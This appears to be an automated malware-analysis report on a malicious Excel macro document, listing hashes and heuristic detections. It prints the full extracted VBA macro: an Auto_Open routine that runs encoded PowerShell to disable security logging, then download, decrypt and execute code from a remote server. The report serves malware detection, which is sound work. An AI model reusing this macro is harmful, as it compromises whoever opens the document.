Office (OOXML) malware analysis — malicious · ecb5c192048162b5

MALICIOUS

Office (OOXML)

17.2 KB Created: 2021-11-06 10:48:11 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-11-22

MD5: 328d65aa92aa512da3616f22b6853daa SHA-1: b042c2ad6c96b5ae22b72462e010b4a3018de193 SHA-256: ecb5c192048162b56bba131c3739fc0aa75e55f796da60e873c63a080cf2bcc4

288 Risk Score

Heuristics 7

VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

        R = R + "AEkAVgArACQASwApACkAfABJAEUAWAA="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (R)

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

        R = R + "AEkAVgArACQASwApACkAfABJAEUAWAA="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (R)

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

        Dim R As String
        R = "powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVg"
        R = R + "BFAHIAcwBpAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAUwBJ"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        R = R + "AEkAVgArACQASwApACkAfABJAEUAWAA="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (R)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Attribute VB_Name = "Module1"
Sub Auto_Open()
        QZ
```

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	6330 bytes
SHA-256: `6f2346b3e30e011a4cacc83fd3a4668df623db9d1322371ed75ee7ca6abf8cf9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Auto_Open() QZ End Sub Public Function QZ() As Variant Dim R As String R = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVg" R = R + "BFAHIAcwBpAG8AbgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAUwBJ" R = R + "AG8AbgAuAE0AQQBKAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAE" R = R + "UAZgA9AFsAUgBFAGYAXQAuAEEAcwBTAGUAbQBCAEwAeQAuAEcA" R = R + "ZQBUAFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ" R = R + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBB" R = R + "AG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC" R = R + "4ARwBlAFQARgBpAEUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQA" R = R + "RgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbA" R = R + "BpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdABWAGEATABV" R = R + "AGUAKAAkAG4AdQBsAGwALAAkAFQAcgB1AEUAKQA7AFsAUwB5AH" R = R + "MAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYA" R = R + "ZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQ" R = R + "ByAF0ALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAAnAG0AXwBl" R = R + "ACcAKwAnAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuACcAKwAnAF" R = R + "AAdQBiAGwAaQBjACwAJwArACcASQBuAHMAdABhAG4AYwBlACcA" R = R + "KQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcw" R = R + "BzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBz" R = R + "AHQAZQAnACsAJwBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAE" R = R + "EAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4A" R = R + "UABTAEUAJwArACcAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcg" R = R + "AnACkALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAAnAGUAdAAn" R = R + "ACsAJwB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAH" R = R + "UAYgAnACsAJwBsAGkAYwAsAFMAJwArACcAdABhAHQAaQBjACcA" R = R + "KQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMA" R = R + "ApADsAfQA7AFsAUwBZAFMAVABFAG0ALgBOAEUAdAAuAFMAZQBy" R = R + "AFYAaQBjAGUAUABvAEkATgB0AE0AYQBOAGEAZwBlAHIAXQA6AD" R = R + "oARQB4AHAAZQBDAHQAMQAwADAAQwBvAE4AVABJAG4AVQBFAD0A" R = R + "MAA7ACQAZgA5ADQAZQA9AE4AZQBXAC0ATwBiAEoARQBjAFQAIA" R = R + "BTAFkAUwB0AGUAbQAuAE4ARQBUAC4AVwBFAGIAQwBMAEkAZQBu" R = R + "AFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgAC" R = R + "gAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8A" R = R + "VwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcg" R = R + "B2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAn" R = R + "ADsAJABzAGUAcgA9ACQAKABbAFQARQB4AHQALgBFAG4AYwBPAE" R = R + "QAaQBOAGcAXQA6ADoAVQBuAGkAQwBvAEQARQAuAEcARQBUAFMA" R = R + "VABSAEkATgBnACgAWwBDAE8ATgBWAGUAUgB0AF0AOgA6AEYAcg" R = R + "BvAG0AQgBBAFMARQA2ADQAUwBUAFIAaQBuAGcAKAAnAGEAQQBC" R = R + "ADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAE" R = R + "QAawBBAE0AZwBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEA" R = R + "TQBRAEEAdwBBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAGcAQQ" R = R + "A2AEEARABnAEEATQBBAEEANABBAEQAQQBBACcAKQApACkAOwAk" R = R + "AHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAH" R = R + "AAaABwACcAOwAkAEYAOQA0AGUALgBIAEUAQQBEAGUAUgBzAC4A" R = R + "QQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQ" R = R + "ApADsAJABGADkANABlAC4AUAByAE8AeAB5AD0AWwBTAFkAcwBU" R = R + "AGUAbQAuAE4AZQB0AC4AVwBlAEIAUgBlAFEAdQBFAFMAdABdAD" R = R + "oAOgBEAGUARgBhAHUATAB0AFcAZQBCAFAAcgBvAFgAWQA7ACQA" R = R + "ZgA5ADQARQAuAFAAUgBPAHgAeQAuAEMAUgBlAEQARQBOAFQAaQ" R = R + "BBAEwAcwAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBFAHQALgBD" R = R + "AFIARQBEAGUATgB0AGkAQQBsAEMAYQBDAGgARQBdADoAOgBEAG" R = R + "UAZgBBAFUAbABUAE4ARQB0AFcATwByAGsAQwByAEUAZABFAE4A" R = R + "VABJAGEATABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQ" R = R + "AgAD0AIAAkAGYAOQA0AGUALgBQAHIAbwB4AHkAOwAkAEsAPQBb" R = R + "AFMAWQBzAHQARQBtAC4AVABlAHgAdAAuAEUATgBjAG8AZABpAE" R = R + "4ARwBdADoAOgBBAFMAQwBJAEkALgBHAEUAdABCAFkAdABFAFMA" R = R + "KAAnAHQAdgBEAFkAfQB5AF8AMQArAC0AWABzACUAPwBsACMALw" R = R + "AsACYAQgBpAEUAOgApAEwAZgBTAFUAYQBRAEkAMwAnACkAOwAk" R = R + "AFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAUwA7ACQAUwA9AD" R = R + "AALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0A" R = R + "KAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASw" R = R + "AuAEMAbwBVAG4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBd" R = R + "ACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbAC" R = R + "QAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkA" R = R + "JQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQ" R = R + "AlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9" R = R + "ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAH" R = R + "gAbwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgA" R = R + "XQApACUAMgA1ADYAXQB9AH0AOwAkAGYAOQA0AEUALgBIAEUAQQ" R = R + "BkAEUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAi" R = R + "AGgAdgB6AHMAdQBTAEYATgBhAFYARABSAD0AdgB3AHAAUQBmAH" R = R + "YAYgBWAFUAagBEAGgAdQBNADUAVAB1AG0AWQBVAHcAcgBCAGkA" R = R + "ZwBNAGsAPQAiACkAOwAkAGQAYQB0AEEAPQAkAEYAOQA0AEUALg" R = R + "BEAE8AdwBOAEwAbwBBAGQARABBAHQAQQAoACQAUwBlAHIAKwAk" R = R + "AHQAKQA7ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdAD" R = R + "sAJABkAEEAVABBAD0AJABEAGEAVABBAFsANAAuAC4AJABEAEEA" R = R + "VABhAC4AbABlAG4ARwBUAEgAXQA7AC0AagBvAEkAbgBbAEMASA" R = R + "BhAHIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAVABBACAAKAAk" R = R + "AEkAVgArACQASwApACkAfABJAEUAWAA=" Set asd = CreateObject("WScript.Shell") asd.Run (R) End Function Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	22016 bytes
SHA-256: `bc0a0a334248f37f4ae2a671dc4e70a395a87ad720ef54069f818a9956a18c01`

Open this report in the interactive analyzer, or submit your own file for analysis.